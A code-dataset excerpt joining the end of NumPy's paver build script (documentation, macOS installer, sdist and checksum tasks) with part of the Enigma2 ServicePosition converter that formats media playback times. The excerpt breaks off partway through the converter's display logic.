        if os.path.exists(d):
            shutil.rmtree(d)
#---------------------
# Documentation tasks
#---------------------
@task
def html(options):
    """Build numpy documentation and put it into build/docs"""
    # Don't use paver html target because of numpy bootstrapping problems
    bdir = os.path.join("doc", options.sphinx.builddir, "html")
    if os.path.exists(bdir):
        shutil.rmtree(bdir)
    subprocess.check_call(["make", "html"], cwd="doc")
    # Mirror the freshly built tree into the destination directory.
    html_destdir = options.html.builddir
    if os.path.exists(html_destdir):
        shutil.rmtree(html_destdir)
    shutil.copytree(bdir, html_destdir)
@task
def latex():
    """Build numpy documentation in latex format."""
    # Delegate entirely to the doc/ Makefile.
    subprocess.check_call(["make", "latex"], cwd="doc")
@task
@needs('latex')
def pdf():
    """Build the PDF docs from the latex output and stage the user guide
    and reference manual under the configured pdf destination dir."""
    sdir = options.doc.sdir
    bdir = options.doc.bdir
    bdir_latex = options.doc.bdir_latex
    destdir_pdf = options.doc.destdir_pdf
    def build_pdf():
        subprocess.check_call(["make", "all-pdf"], cwd=str(bdir_latex))
    # dry() lets paver skip the build in --dry-run mode.
    dry("Build pdf doc", build_pdf)
    if os.path.exists(destdir_pdf):
        shutil.rmtree(destdir_pdf)
    os.makedirs(destdir_pdf)
    user = os.path.join(bdir_latex, "numpy-user.pdf")
    shutil.copy(user, os.path.join(destdir_pdf, "userguide.pdf"))
    ref = os.path.join(bdir_latex, "numpy-ref.pdf")
    shutil.copy(ref, os.path.join(destdir_pdf, "reference.pdf"))
#------------------
# Mac OS X targets
#------------------
def dmg_name(fullversion, pyver, osxver=None):
    """Return name for dmg installer.

    Notes
    -----
    Python 2.7 has two binaries, one for 10.3 (ppc, i386) and one for 10.6
    (i386, x86_64). All other Python versions at python.org at the moment
    have binaries for 10.3 only. The "macosx%s" part of the dmg name should
    correspond to the python.org naming scheme.
    """
    # assume that for the py2.7/osx10.6 build the deployment target is set
    # (should be done in the release script).
    target = osxver or os.environ.get('MACOSX_DEPLOYMENT_TARGET', '10.3')
    return "numpy-{0}-py{1}-python.org-macosx{2}.dmg".format(fullversion,
                                                             pyver, target)
def macosx_version():
    """Return the (major, minor, patch) version strings of the host OS X.

    :return: tuple of three digit strings, or None if sw_vers output does
        not match the expected format.
    :raises ValueError: when not running on darwin.
    """
    if not sys.platform == 'darwin':
        raise ValueError("Not darwin ??")
    # universal_newlines makes stdout yield text on Python 3; the original
    # matched a str pattern against bytes lines, which raises TypeError
    # on 3.x.
    st = subprocess.Popen(["sw_vers"], stdout=subprocess.PIPE,
                          universal_newlines=True)
    out = st.stdout.readlines()
    # Raw string so the \s escape is not interpreted by the str literal.
    ver = re.compile(r"ProductVersion:\s+([0-9]+)\.([0-9]+)\.([0-9]+)")
    for i in out:
        m = ver.match(i)
        if m:
            return m.groups()
def mpkg_name(pyver):
    """Return the mpkg bundle name for *pyver* on the current OS X release."""
    maj, min = macosx_version()[:2]
    # Note that bdist_mpkg breaks this if building a dev version with a git
    # commit string attached. make_fullplatcomponents() in
    # bdist_mpkg/cmd_bdist_mpkg.py replaces '-' with '_', comment this out if
    # needed.
    return "numpy-%s-py%s-macosx%s.%s.mpkg" % (FULLVERSION, pyver, maj, min)
def _build_mpkg(pyver):
    """Run 'setup.py bdist_mpkg' for *pyver* with architecture-correct LDFLAGS."""
    # Account for differences between Python 2.7.1 versions from python.org:
    # the 10.6 deployment target ships i386/x86_64, everything else i386/ppc.
    if os.environ.get('MACOSX_DEPLOYMENT_TARGET', None) == "10.6":
        ldflags = "-undefined dynamic_lookup -bundle -arch i386 -arch x86_64 -Wl,-search_paths_first"
    else:
        ldflags = "-undefined dynamic_lookup -bundle -arch i386 -arch ppc -Wl,-search_paths_first"
    build_lib = os.path.join(os.path.dirname(__file__), "build")
    ldflags += " -L%s" % build_lib
    sh("LDFLAGS='%s' %s setup.py bdist_mpkg" % (ldflags, " ".join(MPKG_PYTHON[pyver])))
@task
def simple_dmg():
    """Build a minimal dmg for python 2.6 containing only the mpkg installer."""
    pyver = "2.6"
    src_dir = "dmg-source"
    # Clean the source dir
    if os.path.exists(src_dir):
        shutil.rmtree(src_dir)
    os.makedirs(src_dir)
    # Build the mpkg
    clean()
    _build_mpkg(pyver)
    # Build the dmg: stage the mpkg into the image source, then wrap it.
    shutil.copytree(os.path.join("dist", mpkg_name(pyver)),
                    os.path.join(src_dir, mpkg_name(pyver)))
    _create_dmg(pyver, src_dir, "NumPy Universal %s" % FULLVERSION)
@task
def bdist_mpkg(options):
    """Build the OS X mpkg installer after a full clean."""
    call_task("clean")
    try:
        # Task-specific option takes precedence over the global one.
        pyver = options.bdist_mpkg.python_version
    except AttributeError:
        pyver = options.python_version
    _build_mpkg(pyver)
def _create_dmg(pyver, src_dir, volname=None):
    """Create a dmg image from *src_dir* via hdiutil, replacing any old image."""
    image_name = dmg_name(FULLVERSION, pyver)
    if os.path.exists(image_name):
        os.remove(image_name)
    cmd = ["hdiutil", "create", image_name, "-srcdir", src_dir]
    if volname:
        # Quote the volume name since the command is joined into a shell string.
        cmd += ["-volname", "'%s'" % volname]
    sh(" ".join(cmd))
@task
@cmdopts([("python-version=", "p", "python version")])
def dmg(options):
    """Build the full OS X dmg installer (mpkg plus pdf docs) and copy it
    into the installers directory."""
    try:
        pyver = options.dmg.python_version
    except AttributeError:
        # Only a missing option should fall back to the default; the
        # original bare 'except:' also hid unrelated errors.
        pyver = DEFAULT_PYTHON
    idirs = options.installers.installersdir
    # Check if docs exist. If not, warn (the build continues regardless).
    ref = os.path.join(options.doc.destdir_pdf, "reference.pdf")
    user = os.path.join(options.doc.destdir_pdf, "userguide.pdf")
    if (not os.path.exists(ref)) or (not os.path.exists(user)):
        import warnings
        warnings.warn("Docs need to be built first! Can't find them.", stacklevel=2)
    # Build the mpkg package
    call_task("clean")
    _build_mpkg(pyver)
    macosx_installer_dir = "tools/numpy-macosx-installer"
    dmg = os.path.join(macosx_installer_dir, dmg_name(FULLVERSION, pyver))
    if os.path.exists(dmg):
        os.remove(dmg)
    # Clean the image source
    content = os.path.join(macosx_installer_dir, 'content')
    if os.path.exists(content):
        shutil.rmtree(content)
    os.makedirs(content)
    # Copy mpkg into image source
    mpkg_source = os.path.join("dist", mpkg_name(pyver))
    mpkg_target = os.path.join(content, "numpy-%s-py%s.mpkg" % (FULLVERSION, pyver))
    shutil.copytree(mpkg_source, mpkg_target)
    # Copy docs into image source
    pdf_docs = os.path.join(content, "Documentation")
    if os.path.exists(pdf_docs):
        shutil.rmtree(pdf_docs)
    os.makedirs(pdf_docs)
    shutil.copy(user, os.path.join(pdf_docs, "userguide.pdf"))
    shutil.copy(ref, os.path.join(pdf_docs, "reference.pdf"))
    # Build the dmg
    cmd = ["./new-create-dmg", "--pkgname", os.path.basename(mpkg_target),
           "--volname", "numpy", os.path.basename(dmg), "./content"]
    st = subprocess.check_call(cmd, cwd=macosx_installer_dir)
    # Copy the result into the installers directory.
    source = dmg
    target = os.path.join(idirs, os.path.basename(dmg))
    if not os.path.exists(os.path.dirname(target)):
        os.makedirs(os.path.dirname(target))
    shutil.copy(source, target)
#--------------------------
# Source distribution stuff
#--------------------------
def tarball_name(type='gztar'):
    """Return the sdist archive name for the given archive *type*.

    Supported types are 'gztar' and 'zip'; anything else raises ValueError.
    """
    root = 'numpy-%s' % FULLVERSION
    suffixes = {'gztar': '.tar.gz', 'zip': '.zip'}
    try:
        return root + suffixes[type]
    except KeyError:
        raise ValueError("Unknown type %s" % type)
@task
def sdist(options):
    """Build gztar and zip source distributions and copy them into the
    installers directory."""
    # First clean the repo and update submodules (for up-to-date doc html theme
    # and Sphinx extensions)
    sh('git clean -xdf')
    sh('git submodule init')
    sh('git submodule update')
    # To be sure to bypass paver when building sdist... paver + numpy.distutils
    # do not play well together.
    # Cython is run over all Cython files in setup.py, so generated C files
    # will be included.
    sh('python setup.py sdist --formats=gztar,zip')
    # Copy the superpack into installers dir
    idirs = options.installers.installersdir
    if not os.path.exists(idirs):
        os.makedirs(idirs)
    for t in ['gztar', 'zip']:
        source = os.path.join('dist', tarball_name(t))
        target = os.path.join(idirs, tarball_name(t))
        shutil.copy(source, target)
def compute_md5(idirs):
    """Return a list of 'md5hex  basename' strings for every file in *idirs*."""
    released = paver.path.path(idirs).listdir()
    checksums = []
    for fn in sorted(released):
        # Read in binary mode: the release artifacts are binary and text
        # mode would corrupt or fail to decode them; 'with' also closes
        # the handle, which the original leaked.
        with open(fn, 'rb') as f:
            m = md5(f.read())
        checksums.append('%s %s' % (m.hexdigest(), os.path.basename(fn)))
    return checksums
def compute_sha256(idirs):
    """Return a list of 'sha256hex  basename' strings for every file in *idirs*.

    A better checksum than md5, so a gpg-signed README.txt containing the sums
    can be used to verify the binaries instead of signing all binaries.
    """
    released = paver.path.path(idirs).listdir()
    checksums = []
    for fn in sorted(released):
        # Binary-mode read plus context manager; see compute_md5 for rationale.
        with open(fn, 'rb') as f:
            m = sha256(f.read())
        checksums.append('%s %s' % (m.hexdigest(), os.path.basename(fn)))
    return checksums
def write_release_task(options, filename='NOTES.txt'):
    """Copy the release notes to *filename* and append MD5/SHA256 checksums
    of everything in the installers directory."""
    idirs = options.installers.installersdir
    source = paver.path.path(RELEASE_NOTES)
    target = paver.path.path(filename)
    if target.exists():
        target.remove()
    source.copy(target)
    # 'with' guarantees the appended checksums are flushed and the handle
    # closed; the original never closed the file.
    with open(str(target), 'a') as ftarget:
        ftarget.write("""
Checksums
=========
MD5
~~~
""")
        ftarget.writelines(['%s\n' % c for c in compute_md5(idirs)])
        ftarget.write("""
SHA256
~~~~~~
""")
        ftarget.writelines(['%s\n' % c for c in compute_sha256(idirs)])
def write_log_task(options, filename='Changelog'):
    """Write the git commit log between LOG_START and LOG_END to *filename*."""
    st = subprocess.Popen(
        ['git', 'log', '--no-merges', '--use-mailmap',
         '%s..%s' % (LOG_START, LOG_END)],
        stdout=subprocess.PIPE)
    out = st.communicate()[0]
    # 'with' closes the file even if the write raises; the original only
    # closed it on the happy path.
    with open(filename, 'w') as changelog:
        changelog.writelines(out)
@task
def write_release(options):
    """Paver task: write the NOTES.txt release file with checksums."""
    write_release_task(options)
@task
def write_log(options):
    """Paver task: write the Changelog file from the git history."""
    write_log_task(options)
@task
def write_release_and_log(options):
    """Paver task: write both NOTES.txt and Changelog into the release dir."""
    rdir = options.installers.releasedir
    write_release_task(options, os.path.join(rdir, 'NOTES.txt'))
    write_log_task(options, os.path.join(rdir, 'Changelog'))
| bsd-3-clause |
oe-alliance/oe-alliance-enigma2 | lib/python/Components/Converter/ServicePosition.py | 31 | 21550 | from Converter import Converter
from Poll import Poll
from enigma import iPlayableService
from Components.Element import cached, ElementError
from Components.config import config
class ServicePosition(Poll, Converter, object):
    """Converter exposing the current service's play position, length and
    remaining time as text, gauge value and cutlist, with separate
    formatting modes for the OSD (types < 5) and the front display/VFD
    (types >= 5)."""

    # Output modes; OSD variants first, VFD variants offset by 5.
    TYPE_LENGTH = 0
    TYPE_POSITION = 1
    TYPE_REMAINING = 2
    TYPE_GAUGE = 3
    TYPE_SUMMARY = 4
    TYPE_VFD_LENGTH = 5
    TYPE_VFD_POSITION = 6
    TYPE_VFD_REMAINING = 7
    TYPE_VFD_GAUGE = 8
    TYPE_VFD_SUMMARY = 9

    def __init__(self, type):
        # 'type' is the skin argument string, e.g. "Position,ShowHours,Negate".
        Poll.__init__(self)
        Converter.__init__(self, type)
        args = type.split(',')
        type = args.pop(0)
        self.negate = 'Negate' in args
        self.detailed = 'Detailed' in args
        self.showHours = 'ShowHours' in args
        self.showNoSeconds = 'ShowNoSeconds' in args
        if type == "Length":
            self.type = self.TYPE_LENGTH
        elif type == "Position":
            self.type = self.TYPE_POSITION
        elif type == "Remaining":
            self.type = self.TYPE_REMAINING
        elif type == "Gauge":
            self.type = self.TYPE_GAUGE
        elif type == "Summary":
            self.type = self.TYPE_SUMMARY
        elif type == "VFDLength":
            self.type = self.TYPE_VFD_LENGTH
        elif type == "VFDPosition":
            self.type = self.TYPE_VFD_POSITION
        elif type == "VFDRemaining":
            self.type = self.TYPE_VFD_REMAINING
        elif type == "VFDGauge":
            self.type = self.TYPE_VFD_GAUGE
        elif type == "VFDSummary":
            self.type = self.TYPE_VFD_SUMMARY
        else:
            raise ElementError("type must be {Length|Position|Remaining|Gauge|Summary} with optional arguments {Negate|Detailed|ShowHours|ShowNoSeconds} for ServicePosition converter")
        # Detailed mode shows milliseconds, so poll fast; length rarely
        # changes, so poll slowly; everything else at 2 Hz.
        if self.detailed:
            self.poll_interval = 100
        elif self.type == self.TYPE_LENGTH or self.type == self.TYPE_VFD_LENGTH:
            self.poll_interval = 2000
        else:
            self.poll_interval = 500
        self.poll_enabled = True

    def getSeek(self):
        # Return the service's seek interface, or None/False when unavailable.
        s = self.source.service
        return s and s.seek()

    @cached
    def getPosition(self):
        # Current play position in PTS (90000 ticks per second); 0 on error.
        seek = self.getSeek()
        if seek is None:
            return None
        pos = seek.getPlayPosition()
        if pos[0]:  # non-zero first element signals an error
            return 0
        return pos[1]

    @cached
    def getLength(self):
        # Total service length in PTS ticks; 0 on error, None without seek.
        seek = self.getSeek()
        if seek is None:
            return None
        length = seek.getLength()
        if length[0]:  # non-zero first element signals an error
            return 0
        return length[1]

    @cached
    def getCutlist(self):
        # Cut list of the current service (for the gauge renderer), if any.
        service = self.source.service
        cue = service and service.cueSheet()
        return cue and cue.getCutList()

    @cached
    def getText(self):
        # Render position/length/remaining as text according to self.type
        # and the user's OSD/VFD display configuration.
        seek = self.getSeek()
        if seek is None:
            return ""
        # NOTE(review): the second operand repeats TYPE_SUMMARY; it was
        # presumably meant to be TYPE_VFD_SUMMARY — confirm before changing.
        if self.type == self.TYPE_SUMMARY or self.type == self.TYPE_SUMMARY:
            s = self.position / 90000
            e = (self.length / 90000) - s
            return "%02d:%02d +%2dm" % (s/60, s%60, e/60)
        l = self.length
        p = self.position
        r = self.length - self.position # Remaining
        if l < 0:
            return ""
        if not self.detailed:
            # Convert PTS ticks to whole seconds unless milliseconds wanted.
            l /= 90000
            p /= 90000
            r /= 90000
        if self.negate: l = -l
        if self.negate: p = -p
        if self.negate: r = -r
        # Split each value into magnitude and sign prefix.
        if l >= 0:
            sign_l = ""
        else:
            l = -l
            sign_l = "-"
        if p >= 0:
            sign_p = ""
        else:
            p = -p
            sign_p = "-"
        if r >= 0:
            sign_r = ""
        else:
            r = -r
            sign_r = "-"
        if self.type < 5:
            # ---- OSD variants ----
            # Signs are overridden by the elapsed/remaining polarity setting.
            if config.usage.elapsed_time_positive_osd.value:
                sign_p = "+"
                sign_r = "-"
                sign_l = ""
            else:
                sign_p = "-"
                sign_r = "+"
                sign_l = ""
            if config.usage.swap_media_time_display_on_osd.value == "1": # Mins
                if self.type == self.TYPE_LENGTH:
                    return ngettext("%d Min", "%d Mins", (l/60)) % (l/60)
                elif self.type == self.TYPE_POSITION:
                    if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
                        return sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
                    elif config.usage.swap_time_remaining_on_osd.value == "2": # Elapsed & Remaining
                        return sign_p + "%d " % (p/60) + sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
                    elif config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
                        return sign_r + "%d " % (r/60) + sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
                    else:
                        return sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
                elif self.type == self.TYPE_REMAINING:
                    if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
                        return sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
                    elif config.usage.swap_time_remaining_on_osd.value == "2" or config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
                        return ""
                    else:
                        return sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
            elif config.usage.swap_media_time_display_on_osd.value == "2": # Mins Secs
                if self.type == self.TYPE_LENGTH:
                    return sign_l + "%d:%02d" % (l/60, l%60)
                elif self.type == self.TYPE_POSITION:
                    if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
                        return sign_p + "%d:%02d" % (p/60, p%60)
                    elif config.usage.swap_time_remaining_on_osd.value == "2": # Elapsed & Remaining
                        return sign_p + "%d:%02d " % (p/60, p%60) + sign_r + "%d:%02d" % (r/60, r%60)
                    elif config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
                        return sign_r + "%d:%02d " % (r/60, r%60) + sign_p + "%d:%02d" % (p/60, p%60)
                    else:
                        return sign_r + "%d:%02d" % (r/60, r%60)
                elif self.type == self.TYPE_REMAINING:
                    if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
                        return sign_p + "%d:%02d" % (p/60, p%60)
                    elif config.usage.swap_time_remaining_on_osd.value == "2" or config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
                        return ""
                    else:
                        return sign_r + "%d:%02d" % (r/60, r%60)
            elif config.usage.swap_media_time_display_on_osd.value == "3": # Hours Mins
                if self.type == self.TYPE_LENGTH:
                    return sign_l + "%d:%02d" % (l/3600, l%3600/60)
                elif self.type == self.TYPE_POSITION:
                    if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
                        return sign_p + "%d:%02d" % (p/3600, p%3600/60)
                    elif config.usage.swap_time_remaining_on_osd.value == "2": # Elapsed & Remaining
                        return sign_p + "%d:%02d " % (p/3600, p%3600/60) + sign_r + "%d:%02d" % (r/3600, r%3600/60)
                    elif config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
                        return sign_r + "%d:%02d " % (r/3600, r%3600/60) + sign_p + "%d:%02d" % (p/3600, p%3600/60)
                    else:
                        return sign_r + "%d:%02d" % (r/3600, r%3600/60)
                elif self.type == self.TYPE_REMAINING:
                    if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
                        return sign_p + "%d:%02d" % (p/3600, p%3600/60)
                    elif config.usage.swap_time_remaining_on_osd.value == "2" or config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
                        return ""
                    else:
                        return sign_r + "%d:%02d" % (r/3600, r%3600/60)
            elif config.usage.swap_media_time_display_on_osd.value == "4": # Hours Mins Secs
                if self.type == self.TYPE_LENGTH:
                    return sign_l + "%d:%02d:%02d" % (l/3600, l%3600/60, l%60)
                elif self.type == self.TYPE_POSITION:
                    if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
                        return sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
                    elif config.usage.swap_time_remaining_on_osd.value == "2": # Elapsed & Remaining
                        return sign_p + "%d:%02d:%02d " % (p/3600, p%3600/60, p%60) + sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
                    elif config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
                        return sign_r + "%d:%02d:%02d " % (r/3600, r%3600/60, r%60) + sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
                    else:
                        return sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
                elif self.type == self.TYPE_REMAINING:
                    if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
                        return sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
                    elif config.usage.swap_time_remaining_on_osd.value == "2" or config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
                        return ""
                    else:
                        return sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
            elif config.usage.swap_media_time_display_on_osd.value == "5": # Percentage
                if self.type == self.TYPE_LENGTH:
                    return sign_l + "%d:%02d" % (l/3600, l%3600/60)
                elif self.type == self.TYPE_POSITION:
                    if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
                        try:
                            return sign_p + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
                        except:
                            return ""
                    elif config.usage.swap_time_remaining_on_osd.value == "2": # Elapsed & Remaining
                        try:
                            return sign_p + "%d%% " % ((float(p + 0.0) / float(l + 0.0)) * 100) + sign_r + "%d%%" % ((float(r + 0.0) / float(l + 0.0)) * 100 + 1)
                        except:
                            return ""
                    elif config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
                        try:
                            return sign_r + "%d%% " % ((float(r + 0.0) / float(l + 0.0)) * 100 +1 ) + sign_p + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
                        except:
                            return ""
                    else:
                        try:
                            # NOTE(review): uses p (elapsed) with sign_r; the
                            # sibling branches use r here — possible bug, confirm.
                            return sign_r + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
                        except:
                            return ""
                elif self.type == self.TYPE_REMAINING:
                    test = 0  # dead variable, never read
                    if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
                        try:
                            return sign_p + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
                        except:
                            return ""
                    elif config.usage.swap_time_remaining_on_osd.value == "2" or config.usage.swap_time_remaining_on_osd.value == "3": # Elapsed & Remaining
                        return ""
                    else:
                        try:
                            # NOTE(review): uses p with sign_r — same suspected
                            # bug as the TYPE_POSITION fallback above.
                            return sign_r + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
                        except:
                            return ""
            else: # Skin Setting
                if not self.detailed:
                    if self.showHours:
                        if self.showNoSeconds:
                            if self.type == self.TYPE_LENGTH:
                                return sign_l + "%d:%02d" % (l/3600, l%3600/60)
                            elif self.type == self.TYPE_POSITION:
                                return sign_p + "%d:%02d" % (p/3600, p%3600/60)
                            elif self.type == self.TYPE_REMAINING:
                                return sign_r + "%d:%02d" % (r/3600, r%3600/60)
                        else:
                            if self.type == self.TYPE_LENGTH:
                                return sign_l + "%d:%02d:%02d" % (l/3600, l%3600/60, l%60)
                            elif self.type == self.TYPE_POSITION:
                                return sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
                            elif self.type == self.TYPE_REMAINING:
                                return sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
                    else:
                        if self.showNoSeconds:
                            if self.type == self.TYPE_LENGTH:
                                return ngettext("%d Min", "%d Mins", (l/60)) % (l/60)
                            elif self.type == self.TYPE_POSITION:
                                return sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
                            elif self.type == self.TYPE_REMAINING:
                                return sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
                        else:
                            if self.type == self.TYPE_LENGTH:
                                return sign_l + "%d:%02d" % (l/60, l%60)
                            elif self.type == self.TYPE_POSITION:
                                return sign_p + "%d:%02d" % (p/60, p%60)
                            elif self.type == self.TYPE_REMAINING:
                                return sign_r + "%d:%02d" % (r/60, r%60)
                else:
                    # Detailed: values are still PTS ticks; show milliseconds.
                    if self.showHours:
                        if self.type == self.TYPE_LENGTH:
                            return sign_l + "%d:%02d:%02d:%03d" % ((l/3600/90000), (l/90000)%3600/60, (l/90000)%60, (l%90000)/90)
                        elif self.type == self.TYPE_POSITION:
                            # NOTE(review): returns sign_r/r for POSITION and
                            # sign_p/p for REMAINING below — looks swapped; confirm.
                            return sign_r + "%d:%02d:%02d:%03d" % ((r/3600/90000), (r/90000)%3600/60, (r/90000)%60, (r%90000)/90)
                        elif self.type == self.TYPE_REMAINING:
                            return sign_p + "%d:%02d:%02d:%03d" % ((p/3600/90000), (p/90000)%3600/60, (p/90000)%60, (p%90000)/90)
                    else:
                        if self.type == self.TYPE_LENGTH:
                            return sign_l + "%d:%02d:%03d" % ((l/60/90000), (l/90000)%60, (l%90000)/90)
                        elif self.type == self.TYPE_POSITION:
                            return sign_p + "%d:%02d:%03d" % ((p/60/90000), (p/90000)%60, (p%90000)/90)
                        elif self.type == self.TYPE_REMAINING:
                            return sign_r + "%d:%02d:%03d" % ((r/60/90000), (r/90000)%60, (r%90000)/90)
        else:
            # ---- VFD (front display) variants ----
            if config.usage.elapsed_time_positive_vfd.value:
                sign_p = "+"
                sign_r = "-"
            else:
                sign_p = "-"
                sign_r = "+"
            if config.usage.swap_media_time_display_on_vfd.value == "1": # Mins
                if self.type == self.TYPE_VFD_LENGTH:
                    return ngettext("%d Min", "%d Mins", (l/60)) % (l/60)
                elif self.type == self.TYPE_VFD_POSITION:
                    if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
                        return sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
                    elif config.usage.swap_time_remaining_on_vfd.value == "2": # Elapsed & Remaining
                        return sign_p + "%d " % (p/60) + sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
                    elif config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
                        return sign_r + "%d " % (r/60) + sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
                    else:
                        return sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
                elif self.type == self.TYPE_VFD_REMAINING:
                    if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
                        return sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
                    elif config.usage.swap_time_remaining_on_vfd.value == "2" or config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
                        return ""
                    else:
                        return sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
            elif config.usage.swap_media_time_display_on_vfd.value == "2": # Mins Secs
                if self.type == self.TYPE_VFD_LENGTH:
                    return sign_l + "%d:%02d" % (l/60, l%60)
                elif self.type == self.TYPE_VFD_POSITION:
                    if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
                        return sign_p + "%d:%02d" % (p/60, p%60)
                    elif config.usage.swap_time_remaining_on_vfd.value == "2": # Elapsed & Remaining
                        return sign_p + "%d:%02d " % (p/60, p%60) + sign_r + "%d:%02d" % (r/60, r%60)
                    elif config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
                        return sign_r + "%d:%02d " % (r/60, r%60) + sign_p + "%d:%02d" % (p/60, p%60)
                    else:
                        return sign_r + "%d:%02d" % (r/60, r%60)
                elif self.type == self.TYPE_VFD_REMAINING:
                    if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
                        return sign_p + "%d:%02d" % (p/60, p%60)
                    elif config.usage.swap_time_remaining_on_vfd.value == "2" or config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
                        return ""
                    else:
                        return sign_r + "%d:%02d" % (r/60, r%60)
            elif config.usage.swap_media_time_display_on_vfd.value == "3": # Hours Mins
                if self.type == self.TYPE_VFD_LENGTH:
                    return sign_l + "%d:%02d" % (l/3600, l%3600/60)
                elif self.type == self.TYPE_VFD_POSITION:
                    if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
                        return sign_p + "%d:%02d" % (p/3600, p%3600/60)
                    elif config.usage.swap_time_remaining_on_vfd.value == "2": # Elapsed & Remaining
                        return sign_p + "%d:%02d " % (p/3600, p%3600/60) + sign_r + "%d:%02d" % (r/3600, r%3600/60)
                    elif config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
                        return sign_r + "%d:%02d " % (r/3600, r%3600/60) + sign_p + "%d:%02d" % (p/3600, p%3600/60)
                    else:
                        return sign_r + "%d:%02d" % (r/3600, r%3600/60)
                elif self.type == self.TYPE_VFD_REMAINING:
                    if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
                        return sign_p + "%d:%02d" % (p/3600, p%3600/60)
                    elif config.usage.swap_time_remaining_on_vfd.value == "2" or config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
                        return ""
                    else:
                        return sign_r + "%d:%02d" % (r/3600, r%3600/60)
            elif config.usage.swap_media_time_display_on_vfd.value == "4": # Hours Mins Secs
                if self.type == self.TYPE_VFD_LENGTH:
                    return sign_l + "%d:%02d:%02d" % (l/3600, l%3600/60, l%60)
                elif self.type == self.TYPE_VFD_POSITION:
                    if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
                        return sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
                    elif config.usage.swap_time_remaining_on_vfd.value == "2": # Elapsed & Remaining
                        return sign_p + "%d:%02d:%02d " % (p/3600, p%3600/60, p%60) + sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
                    elif config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
                        return sign_r + "%d:%02d:%02d " % (r/3600, r%3600/60, r%60) + sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
                    else:
                        return sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
                elif self.type == self.TYPE_VFD_REMAINING:
                    if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
                        return sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
                    elif config.usage.swap_time_remaining_on_vfd.value == "2" or config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
                        return ""
                    else:
                        return sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
            elif config.usage.swap_media_time_display_on_vfd.value == "5": # Percentage
                if self.type == self.TYPE_VFD_LENGTH:
                    return sign_l + "%d:%02d" % (l/3600, l%3600/60)
                elif self.type == self.TYPE_VFD_POSITION:
                    if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
                        try:
                            return sign_p + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
                        except:
                            return ""
                    elif config.usage.swap_time_remaining_on_vfd.value == "2": # Elapsed & Remaining
                        try:
                            return sign_p + "%d%% " % ((float(p + 0.0) / float(l + 0.0)) * 100) + sign_r + "%d%%" % ((float(r + 0.0) / float(l + 0.0)) * 100 + 1)
                        except:
                            return ""
